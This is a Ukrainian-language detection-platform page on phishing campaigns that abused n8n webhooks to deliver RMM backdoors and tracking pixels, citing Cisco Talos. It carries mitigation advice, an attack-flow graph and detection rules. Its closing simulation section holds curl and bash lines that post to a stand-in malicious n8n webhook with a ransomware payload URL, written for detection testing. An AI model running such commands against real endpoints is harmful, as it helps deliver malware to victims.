Зловмисники зловживають n8n для автоматизації атак на основі штучного інтелекту
Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники використовують платформу автоматизації без коду n8n, щоб поширювати шкідливі навантаження та профілювати одержувачів електронної пошти. Вбудувавши шкідливі URL-адреси вебхуків у фішингові повідомлення, вони можуть доставляти виконувані файли або інсталятори MSI, які впроваджують інструменти віддаленого доступу на системи жертв. Діяльність також включає використання невидимих пікселів відстеження, які збирають інформацію про жертву, як тільки електронна пошта відкривається. Ця кампанія підкреслює, як легітимний сервіс автоматизації робочого процесу може бути перепрофільований для доставки шкідливого коду без необхідності у викрадених облікових даних.
Розслідування
Cisco Talos проаналізувала серію фішингових кампаній, спостережених з жовтня 2025 по березень 2026 року, які спиралися на URL-адреси вебхуків n8n, вбудовані в повідомлення електронної пошти. Приманки використовували фальшиві посилання OneDrive, які спочатку відображали запит CAPTCHA, перш ніж подати шкідливий .exe або файл MSI. Після виконання, навантаження встановлювало модифіковані версії інструментів управління Datto або ITarian RMM і створювали заплановані завдання для забезпечення стійкості. Talos також виявив активність відбитків через мітки зображень, які зверталися до URL-адрес вебхуків n8n, що містили ідентифікатори, специфічні для жертв.
Пом’якшення
Організації повинні контролювати незвичайний вихідний трафік до доменів, пов’язаних з n8n, з систем, які зазвичай не використовують сервіси автоматизації, та перевіряти на підозрілі шаблони URL вебхуків. URL-адреси, що розв’язуються на невідомі піддомени n8n.cloud , мають бути заблоковані або перевірені в пісочницях перед тим, як користувачам буде дозволено доступ. Контроль безпеки електронної пошти також має бути налаштовано для виявлення шкідливого HTML-контенту, фальшивих потоків CAPTCHA та прихованих пікселів відстеження. Відповідна інформація про індикатори компрометації (IOC), включаючи URL-адреси вебхуків та хеші шкідливих файлів, має бути надана платформам кіберрозвідки та внутрішнім захисникам.
Відповідь
Групи безпеки повинні сповіщати про присутність URL-адрес вебхуків n8n у вмісті електронної пошти або телеметрії мережі та ізолювати будь-які уражені хости, як тільки підозріла діяльність буде підтверджена. Будь-які встановлені інструменти RMM та пов’язані з ними заплановані завдання повинні бути видалені, а потім проведено судову експертизу для виявлення додаткових стійких або наступних навантажень. Політики брандмауера та проксі повинні бути оновлені, щоб обмежити доступ до неавторизованих кінцевих точок n8n. Організації також повинні завершити повний процес обміну індикаторами компрометації між внутрішніми командами та довіреними зовнішніми партнерами.
"graph TB %% Визначення класів classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Вузли action_phishing["<b>Дія</b> – <b>T1566 Фішинг</b>: Зловмисники надсилають шкідливі електронні листи з URL-адресами вебхуків n8n, щоб заманити жертв.<br/><b>Опис</b>: Фішинг намагається доставити шкідливий контент через електронну пошту."] class action_phishing action tool_webhook["<b>Інструмент</b> – <b>Назва</b>: n8n вебхук<br/><b>Опис</b>: Користувацька веб-точка, що використовується для доставки навантажень."] class tool_webhook tool action_user_execution["<b>Дія</b> – <b>T1204.001 Виконання користувачем: Шкідливе посилання</b>: Жертва клацає на посилання вебхука, через що браузер запитує URL-адресу.<br/><b>Опис</b>: Користувач взаємодіє зі шкідливим контентом."] class action_user_execution action action_exfil_webhook1["<b>Дія</b> – <b>T1567.004 Експільтрація через вебхук</b>: Вебхук повертає шкідливу HTML-сторінку з CAPTCHA файл і транслює навантаження (EXE або MSI), обслуговуючи пікселі відстеження.<br/><b>Опис</b>: Використовує веб-службу для доставки та виїмки даних."] class action_exfil_webhook1 action malware_payload_exe["<b>Шкідливе ПО</b> – <b>Назва</b>: Навантаження EXE/MSI<br/><b>Опис</b>: Виконуваний файл, що запускає PowerShell для встановлення модифікованого RMM інструмента."] class malware_payload_exe malware action_powershell["<b>Дія</b> – <b>T1059.001 PowerShell</b>: Завантажений виконуваний файл запускає команди PowerShell для налаштування і встановлення модифікованого RMM інструмента.<br/><b>Опис</b>: Інтерпретатор команд та скриптів."] class action_powershell action malware_rmm["<b>Шкідливе ПО</b> – <b>Назва</b>: Модіфікований RMM бекдор<br/><b>Опис</b>: Інструмент дистанційного моніторингу та управління, що використовується для стійкості."] class malware_rmm malware action_service_execution["<b>Дія</b> – <b>T1569.002 Виконання сервісу</b>: Інструмент RMM встановлюється як сервіс Windows для забезпечення стійкості.<br/><b>Опис</b>: Виконується через системний сервіс."] class action_service_execution action action_scheduled_task["<b>Дія</b> – <b>T1053 Заплановане завдання/робота</b>: Заплановане завдання створюється для забезпечення постійного виконання інструмента RMM.<br/><b>Опис</b>: Забезпечує повторюване виконання."] class action_scheduled_task action action_msi_execution["<b>Дія</b> – <b>T1218.007 Msiexec</b>: Шкідливий MSI виконується через msiexec для розгортання RMM бекдора.<br/><b>Опис</b>: Системна виконання за допомогою бінарного проксі."] class action_msi_execution action action_exfil_webhook2["<b>Дія</b> – <b>T1567.004 Експільтрація через вебхук</b>: Невидимий піксель відстеження завантажує вебхук для захоплення подій відкриття електронної пошти та інформації про пристрій для рекогносцировки."] class action_exfil_webhook2 action %% З’єднання action_phishing –>|постачає| tool_webhook tool_webhook –>|спрацьовує| action_user_execution action_user_execution –>|веде до| action_exfil_webhook1 action_exfil_webhook1 –>|постачає| malware_payload_exe malware_payload_exe –>|виконує| action_powershell action_powershell –>|встановлює| malware_rmm malware_rmm –>|зберігає стійкість за допомогою| action_service_execution action_service_execution –>|створює| action_scheduled_task action_scheduled_task –>|підтримує| action_msi_execution action_msi_execution –>|розгортає| malware_rmm malware_rmm –>|спілкується через| action_exfil_webhook2 "
Потік атаки
Виявлення
Можливе шкідливе подвійне розширення файлу (через створення процесу)
Перегляд
Спроба виконання Windows ITarian Endpoint Manager (через створення процесу)
Перегляд
Альтернативне програмне забезпечення віддаленого доступу/управління (через створення процесу)
Перегляд
Можливе впровадження/експільтрація/керування C2 через сторонні сервіси/інструменти (через проксі)
Перегляд
Можливе впровадження/експільтрація/керування C2 через сторонні сервіси/інструменти (через DNS)
Перегляд
Індикатори компрометації (HashSha256) для виявлення: n8n n8mare: Як зловмисники неправильно використовують автоматизацію робочих процесів AI
Перегляд
Виявлення запитів HTTP GET до URL-адрес вебхуків n8n [Proxy]
Перегляд
Виявлення зловживання вебхуками n8n для доставки шкідливого програмного забезпечення та фіксації пристроїв [Вебсервер]
Перегляд
Виконання симуляції
Попередня умова: Телеметрія та перевірка базової лінії повинні були бути пройдені.
Обґрунтування: Цей розділ детально описує точне виконання методики ворога (TTP), призначеної для спрацьовування правила виявлення. Команди та наратив ПОВИННІ безпосередньо відображати ідентифіковані TTP та прагнути створити точну телеметрію, очікувану логікою виявлення.
-
Наратив та команди атаки:
Зловмисник купує короткостроковий домен, який вказує на
n8n.cloud/webhook. Вони створюють шкідливий робочий процес n8n, який, коли спрацьовує, доставляє навантаження з програмою-вимагачем. Фішинговий електронний лист містить посилання на цільову сторінку з викликом CAPTCHA. Жертва розв’язує CAPTCHA, яку JavaScript зловмисника пересилає як значенняCAPTCHA=solved123в тілі HTTP запиту POST до вебхука. Вебхук відповідає завантажувачем PowerShell, який виконує навантаження. Цей потік створює HTTP-запит, чи URL міститьn8n.cloud/webhookand чи його тіло містить рядокCAPTCHA, ідеально відповідаючи правилу Sigma.# Крок 1 – Жертва проходить CAPTCHA (симульоване) CAPTCHA_TOKEN="solved123" # Крок 2 – Створення шкідливого POST, який імітує дії жертви curl -X POST "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=https://malicious.example.com/ransomware.exe" -
Скрипт регресивного тестування:
#!/usr/bin/env bash set -euo pipefail # Змінні – відрегулюйте для вашого середовища тестування WEBHOOK_HOST="my.malicious-n8n.cloud" WEBHOOK_PATH="/webhook/malicious-workflow" CAPTCHA_TOKEN="solved123" PAYLOAD_URL="https://malicious.example.com/ransomware.exe" echo "[*] Симулюємо зловживання вебхуком n8n через CAPTCHA..." curl -s -o /dev/null -w "%{http_code}n" -X POST "https://${WEBHOOK_HOST}${WEBHOOK_PATH}" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=${PAYLOAD_URL}" echo "[+] Симулація завершена. Перевірте виявлення в SIEM." -
Команди очищення:
# Якщо для тестування був створений реальний вебхук, видаліть його через інтерфейс або API n8n. # Приклад виклику API (замініть API_KEY та WORKFLOW_ID): curl -X DELETE "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Authorization: Bearer API_KEY" # Видаліть будь-які тимчасові файли (жодних не створено у цьому скрипті) echo "[+] Очищення завершено."